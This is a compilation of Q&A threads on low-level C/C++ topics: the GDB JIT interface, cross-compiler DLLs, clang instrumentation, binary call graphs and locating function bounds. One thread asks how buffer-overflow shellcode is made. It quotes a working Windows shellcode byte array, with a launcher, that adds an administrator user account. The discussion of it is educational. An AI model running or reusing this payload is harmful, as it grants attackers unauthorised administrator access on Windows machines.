GDB JIT Interface simpliest example - c++

I read the JIT Interface chapter and faced the problem: how to write a simpliest example for simpliest possible code (preferably in C++ and at least for x86-64 platform)? Say, I want to debug the following code (namely, code_.data() function):
#include "eallocator.hpp"
#include <iostream>
#include <vector>
#include <cstdlib>
int main()
{
std::vector< std::uint8_t, eallocator< std::uint8_t > > code_;
code_.push_back(0b11011001u); code_.push_back(0b11101011u); // fldpi
code_.push_back(0b11000011u); // ret
double result_;
__asm("call *%1"
: "=&t"(result_)
: "r"(code_.data())
:
);
std::cout << result_ << std::endl;
return EXIT_SUCCESS;
}
What (minimally) I should to do to use the interface? Particularly, I want to be able to provide some pseudocode (arbitrary text in memory) as "source" (with corresponding lines info) if it possible.
How to instrument the above code (or something similar), while remaining terse.
#include "eallocator.hpp" should use the approaches from this for Windows or from this for Linux.

If I understand you correctly, what you're trying to do is to dynamically emit some executable code into memory and set up GDB to be able to debug it, is that correct?
What makes this task quite difficult to express in a "minimal" example is that GDB actually expects to find a whole ELF object in memory, not just a lump of code. GDB's registration interfaces need ELF symbol tables to examine in order to figure out which symbols exist in the emitted code and where they reside.
Your best bet to do this without unreasonable effort is to look at LLVM. The Debugging JIT-ed Code with GDB section in the documentation describes how to do this with MCJIT, with a full example at the bottom - going from some simple C code, JITing it to memory with LLVM MCJIT and attaching GDB to it. Moreover, since the LLVM MCJIT framework is involved you get full debug info there, up to the C level!
To be honest, that documentation section has not been updated in a while, but it should work. Let me know if it doesn't - I'll look into fixing things and updating it.
I hope this helps.

There is an example in their tests which should help
https://sourceware.org/git/gitweb.cgi?p=binutils-gdb.git;a=blob;f=gdb/testsuite/gdb.base/jit-main.c

Related

Can I include a DLL generated by GCC in a MSVC project?

I have a library of code I'm working on upgrading from x86 to x64 for a Windows application.
Part of the code took advantage of MSVC inline assembly blocks. I'm not looking to go through and interpret the assembly but I am looking to keep functionality from this part of the application.
Can I compile the functions using the inline assembly using GCC to make a DLL and link that to the rest of the library?
EDIT 1:(7/7/21) The flexibility with which compiler the project uses is open and I am currently looking into using Clang for use with MSVC.(also the Intel C++ compiler as another possibility) As stated in the first sentence it is a Windows application that I want to keep on Windows and the purpose of using another compiler is due to me 1.) not wanting to rewrite the large amount of assembly and 2.) because I know that MSVC does not support x64 inline assembly. So far clang seems to be working with a couple issues of how it declares comments inside of the assembly block and a few commands. The function is built around doing mathematical operations on a block of data, in what was supposed to be as fast as possible when it was developed but now that it works as intended I'm not looking to upgrade just maintain functionality. So, any compiler that will support inline assembly is an option.
EDIT 2:(7/7/21) I forgot to mention in the first edit, I'm not necessarily looking to load the 32-bit DLL into another process because I'm worried about copying data into an out of shared memory. I've done a similar solution for another project but the data set is around 8 MB and I'm worried that slow copy times for the function would cause the time constraint on the math to cause issues in the runtime of the application.(slow, laggy, and buffering are effects I'm trying to avoid.) I'm not trying to make it any faster but it definitely can't get any slower.
In theory, if you manage to create a plain C interface for that DLL (all exported symbols from DLL are standard C functions) and don't use memory management functions across "border" (no mixed memory management) then you should be able to dynamically load that DLL from another another (MSVC) process and call its functions, at least.
Not sure about statically linking against it... probably not, because the compiler and linker must go hand in hand (MSVC compiler+MSVC linker or GCC compiler+GCC linker) . The output of GCC linker is probably not compatible with MSVC at least regarding name mangling.
Here is how I would structure it (without small details):
Header.h (separate header to be included in both DLL and EXE)
//... remember to use your preferred calling convention but be consistent about it
struc Interface{
void (*func0)();
void (*func1)(int);
//...
};
typedef Interface* (*GetInterface)();
DLL (gcc)
#include "Header.h"
//functions implementing specific functionality (not exported)
void f0)(){/*...*/}
void f1)(int){/*...*/}
//...
Interface* getInterface(){//this must be exported from DLL (compiler specific)
static Interface interface;
//initialize functions pointers from interface with corresponding functions
interface.func0 = &f0;
interface.func1 = &f1;
//...
return &interface;
}
EXE (MSVC)
#include "Header.h"
int main(){
auto dll = LoadLibrary("DLL.dll");
auto getDllInterface = (GetInstance)GetProcAddress(dll, "getInterface");
auto* dllInterface = getDllInterface();
dllInterface->func0();
dllInterface->func1(123);
//...
return 0;
}

C++ function instrumentation via clang++'s -finstrument-functions : how to ignore internal std library calls?

Let's say I have a function like:
template<typename It, typename Cmp>
void mysort( It begin, It end, Cmp cmp )
{
std::sort( begin, end, cmp );
}
When I compile this using -finstrument-functions-after-inlining with clang++ --version:
clang version 11.0.0 (...)
Target: x86_64-unknown-linux-gnu
Thread model: posix
InstalledDir: ...
The instrument code explodes the execution time, because my entry and exit functions are called for every call of
void std::__introsort_loop<...>(...)
void std::__move_median_to_first<...>(...)
I'm sorting a really big array, so my program doesn't finish: without instrumentation it takes around 10 seconds, with instrumentation I've cancelled it at 10 minutes.
I've tried adding __attribute__((no_instrument_function)) to mysort (and the function that calls mysort), but this doesn't seem to have an effect as far as these standard library calls are concerned.
Does anyone know if it is possible to ignore function instrumentation for the internals of a standard library function like std::sort? Ideally, I would only have mysort instrumented, so a single entry and a single exit!
I see that clang++ sadly does not yet support anything like finstrument-functions-exclude-function-list or finstrument-functions-exclude-file-list, but g++ does not yet support -finstrument-functions-after-inlining which I would ideally have, so I'm stuck!
EDIT: After playing more, it would appear the effect on execution-time is actually less than that described, so this isn't the end of the world. The problem still remains however, because most people who are doing function instrumentation in clang will only care about the application code, and not those functions linked from (for example) the standard library.
EDIT2: To further highlight the problem now that I've got it running in a reasonable time frame: the resulting trace that I produce from the instrumented code with those two standard library functions is 15GB. When I hard code my tracing to ignore the two function addresses, the resulting trace is 3.7MB!
I've run into the same problem. It looks like support for these flags was once proposed, but never merged into the main branch.
https://reviews.llvm.org/D37622
This is not a direct answer, since the tool doesn't support what you want to do, but I think I have a decent work-around. What I wound up doing was creating a "skip list" of sorts. In the instrumented functions (__cyg_profile_func_enter and __cyg_profile_func_exit), I would guess the part that is contributing most to your execution time is the printing. If you can come up with a way of short-circuiting the profile functions, that should help, even if it's not the most ideal. At the very least it will limit the size of the output file.
Something like
#include <stdint.h>
uintptr_t skipAddrs[] = {
// assuming 64-bit addresses
0x123456789abcdef, 0x2468ace2468ace24
};
size_t arrSize = 0;
int main(void)
{
...
arrSize = sizeof(skipAddrs)/sizeof(skipAddrs[0]);
// https://stackoverflow.com/a/37539/12940429
...
}
void __cyg_profile_func_enter (void *this_fn, void *call_site) {
for (size_t idx = 0; idx < arrSize; idx++) {
if ((uintptr_t) this_fn == skipAddrs[idx]) {
return;
}
}
}
I use something like objdump -t binaryFile to examine the symbol table and find what the addresses are for each function.
If you specifically want to ignore library calls, something that might work is examining the symbol table of your object file(s) before linking against libraries, then ignoring all the ones that appear new in the final binary.
All this should be possible with things like grep, awk, or python.
You have to add attribute __attribute__((no_instrument_function)) to the functions that should not be instrumented. Unfortunately it is not easy to make it work with C/C++ standard library functions because this feature requires editing all the C++ library functions.
There are some hacks you can do like #define existing macros from include/__config to add this attribute as well. e.g.,
-D_LIBCPP_INLINE_VISIBILITY=__attribute__((no_instrument_function,internal_linkage))
Make sure to append existing macro definition with no_instrument_function to avoid unexpected errors.

How to get a caller graph from a given symbol in a binary

This question is related to a question I've asked earlier this day: I wonder if it's possible to generate a caller graph from a given function (or symbol name e.g. taken from nm), even if the function of interest is not part of "my" source code (e.g. located in a library, e.g. malloc())
For example to know where malloc is being used in my program named foo I would first lookup the symbol name:
nm foo | grep malloc
U malloc##GLIBC_2.2.5
And then run a tool (which might need a specially compiled/linked version of my program or some compiler artifacts):
find_usages foo-with-debug-symbols "malloc##GLIBC_2.2.5"
Which would generate a (textual) caller graph I can then process further.
Reading this question I found radare2 which seems to accomplish nearly everything you can imagine but somehow I didn't manage to generate a caller graph from a given symbol yet..
Progress
Using radare2 I've managed to generate a dot caller graph from an executable, but something is still missing. I'm compiling the following C++ program which I'm quite sure has to use malloc() or new:
#include <string>
int main() {
auto s = std::string("hello");
s += " welt";
return 0;
}
I compile it with static libraries in order to be sure all calls I want to analyze can be found in the binary:
g++ foo.cpp -static
By running nm a.out | grep -E "_Znwm|_Znam|_Znwj|_Znaj|_ZdlPv|_ZdaPv|malloc|free" you can see a lot of symbols which are used for memory allocation.
Now I run radare2 on the executable:
r2 -qAc 'agCd' a.out > callgraph.dot
With a little script (inspired by this answer) I'm looking for a call-path from any symbol containing "sym.operatornew" but there seems to be none!
Is there a way to make sure all information needed to generate a call graph from/to any function which get's called inside that binary?
Is there a better way to run radare2? It looks like the different call graph visualization types provide different information - e.g. the ascii art generator does provide names for symbols not provided by the dot generator while the dot generator provides much more details regarding calls.
In general, you cannot extract an exact control flow graph from a binary, because of indirect jumps and calls there. A machine code indirect call is jumping into the content of some register, and you cannot reliably estimate all the values that register could take (doing so could be proven equivalent to the halting problem).
Is there a way to make sure all information needed to generate a call graph from/to any function which get's called inside that binary?
No, and that problem is equivalent to the halting problem, so there would be never a sure way to get that call graph (in a complete and sound way).
The C++ compiler would (usually) generate indirect jumps for virtual function calls (they jump thru the vtable) and probably when using a shared library (read Drepper's How To Write Shared Libraries paper for more).
Look into the BINSEC tool (developed by colleagues from CEA, LIST and by INRIA), at least to find references.
If you really want to find most (but not all) dynamic memory allocations in your C++ source code, you might use static source code analysis (like Frama-C or Frama-Clang) and other tools, but they are not a silver bullet.
Remember that allocating functions like malloc or operator new could be put in function pointer locations (and your C++ code might have some allocator deeply buried somewhere, then you are likely to have indirect calls to malloc)
Maybe you could spend months of effort in writing your own GCC plugin to look for calls to malloc after optimizations inside the GCC compiler (but notice that GCC plugins are tied to one particular version of GCC). I am not sure it is worth the effort. My old (obsolete, non maintained) GCC MELT project was able to find calls to malloc with a size above some given constant. Perhaps in at least a year -end of 2019 or later- my successor project (bismon, funded by CHARIOT H2020 project) might be mature enough to help you.
Remember also that GCC is capable of quite fancy optimizations related to malloc. Try to compile the following C code
//file mallfree.c
#include <stdlib.h>
int weirdsum(int x, int y) {
int*ar2 = malloc(2*sizeof(int));
ar2[0] = x; ar2[1] = y;
int r = ar2[0] + ar2[1];
free (ar2);
return r;
}
with gcc -S -fverbose-asm -O3 mallfree.c. You'll see that the generated mallfree.s assembler file contain no call to malloc or to free. Such an optimization is permitted by the As-if rule, and is practically useful to optimize most usages of C++ standard containers.
So what you want is not simple even for apparently "simple" C++ code (and is impossible in the general case).
If you want to code a GCC plugin and have more than a full year to spend on that issue (or could pay at least 500k€ for that), please contact me. See also
https://xkcd.com/1425/ (your question is a virtually impossible one).
BTW, of course, what you really care about is dynamic memory allocation in optimized code (you really want inlining and dead code elimination, and GCC does that quite well with -O3 or -O2). When GCC is not optimizing at all (e.g. with -O0 which is the implicit optimization) it would do a lot of "useless" dynamic memory allocation, specially with C++ code (using the C++ standard library). See also CppCon 2017: Matt Godbolt “What Has My Compiler Done for Me Lately? Unbolting the Compiler's Lid” talk.

How is the shell code of a Buffer Overflow generated

The following codes got my curiosity. I always look, search, and study about the exploit so called "Buffer overflow". I want to know how the code was generated. How and why the code is running?
char shellcode[] = "\x31\xd2\xb2\x30\x64\x8b\x12\x8b\x52\x0c\x8b\x52\x1c\x8b\x42"
"\x08\x8b\x72\x20\x8b\x12\x80\x7e\x0c\x33\x75\xf2\x89\xc7\x03"
"\x78\x3c\x8b\x57\x78\x01\xc2\x8b\x7a\x20\x01\xc7\x31\xed\x8b"
"\x34\xaf\x01\xc6\x45\x81\x3e\x57\x69\x6e\x45\x75\xf2\x8b\x7a"
"\x24\x01\xc7\x66\x8b\x2c\x6f\x8b\x7a\x1c\x01\xc7\x8b\x7c\xaf"
"\xfc\x01\xc7\x68\x4b\x33\x6e\x01\x68\x20\x42\x72\x6f\x68\x2f"
"\x41\x44\x44\x68\x6f\x72\x73\x20\x68\x74\x72\x61\x74\x68\x69"
"\x6e\x69\x73\x68\x20\x41\x64\x6d\x68\x72\x6f\x75\x70\x68\x63"
"\x61\x6c\x67\x68\x74\x20\x6c\x6f\x68\x26\x20\x6e\x65\x68\x44"
"\x44\x20\x26\x68\x6e\x20\x2f\x41\x68\x72\x6f\x4b\x33\x68\x33"
"\x6e\x20\x42\x68\x42\x72\x6f\x4b\x68\x73\x65\x72\x20\x68\x65"
"\x74\x20\x75\x68\x2f\x63\x20\x6e\x68\x65\x78\x65\x20\x68\x63"
"\x6d\x64\x2e\x89\xe5\xfe\x4d\x53\x31\xc0\x50\x55\xff\xd7";
int main(int argc, char **argv){
int (*f)();
f = (int (*)())shellcode;(int)(*f)();
}
Thanks a lot fella's. ^_^
A simple way to generate such a code would be to write the desired functionality in C. Then compile it (not link) using say gcc as your compiler as
gcc -c shellcode.c
This will generate an object file shellcode.o . Now you can see the assembled code using objdump
odjdump -D shellcode.o
Now you can see the bytes corresponding to the instructions in your function.
Please remember though this will work only if your shellcode doesn't call any other function or doesn't reference any globals or strings. That is because the linker has yet not been invoked. If you want all the functionality, I will suggest you generate a shared binary (.so on *NIX and dll on Windows) while exporting the required function. Then you can find the start point of the function and copy bytes from there. You will also have to copy the bytes of all other functions and globals. You will also have to make sure that the shared library is compiled as a position independent library.
Also as mentioned above this code generated is specific to the target and won't work as is on other platforms.
Machine code instructions have been entered directly into the C program as data, then called with a function pointer. If the system allows this, the assembly can take any action allowed to the program, including launching other programs.
The code is specific to the particular processor it is targetted at.

Does an arbitrary instruction pointer reside in a specific function?

I have a very difficult problem I'm trying to solve: Let's say I have an arbitrary instruction pointer. I need to find out if that instruction pointer resides in a specific function (let's call it "Foo").
One approach to this would be to try to find the start and ending bounds of the function and see if the IP resides in it. The starting bound is easy to find:
void *start = &Foo;
The problem is, I don't know how to get the ending address of the function (or how "long" the function is, in bytes of assembly).
Does anyone have any ideas how you would get the "length" of a function, or a completely different way of doing this?
Let's assume that there is no SEH or C++ exception handling in the function. Also note that I am on a win32 platform, and have full access to the win32 api.
This won't work. You're presuming functions are contigous in memory and that one address will map to one function. The optimizer has a lot of leeway here and can move code from functions around the image.
If you have PDB files, you can use something like the dbghelp or DIA API's to figure this out. For instance, SymFromAddr. There may be some ambiguity here as a single address can map to multiple functions.
I've seen code that tries to do this before with something like:
#pragma optimize("", off)
void Foo()
{
}
void FooEnd()
{
}
#pragma optimize("", on)
And then FooEnd-Foo was used to compute the length of function Foo. This approach is incredibly error prone and still makes a lot of assumptions about exactly how the code is generated.
Look at the *.map file which can optionally be generated by the linker when it links the program, or at the program's debug (*.pdb) file.
OK, I haven't done assembly in about 15 years. Back then, I didn't do very much. Also, it was 680x0 asm. BUT...
Don't you just need to put a label before and after the function, take their addresses, subtract them for the function length, and then just compare the IP? I've seen the former done. The latter seems obvious.
If you're doing this in C, look first for debugging support --- ChrisW is spot on with map files, but also see if your C compiler's standard library provides anything for this low-level stuff -- most compilers provide tools for analysing the stack etc., for instance, even though it's not standard. Otherwise, try just using inline assembly, or wrapping the C function with an assembly file and a empty wrapper function with those labels.
The most simple solution is maintaining a state variable:
volatile int FOO_is_running = 0;
int Foo( int par ){
FOO_is_running = 1;
/* do the work */
FOO_is_running = 0;
return 0;
}
Here's how I do it, but it's using gcc/gdb.
$ gdb ImageWithSymbols
gdb> info line * 0xYourEIPhere
Edit: Formatting is giving me fits. Time for another beer.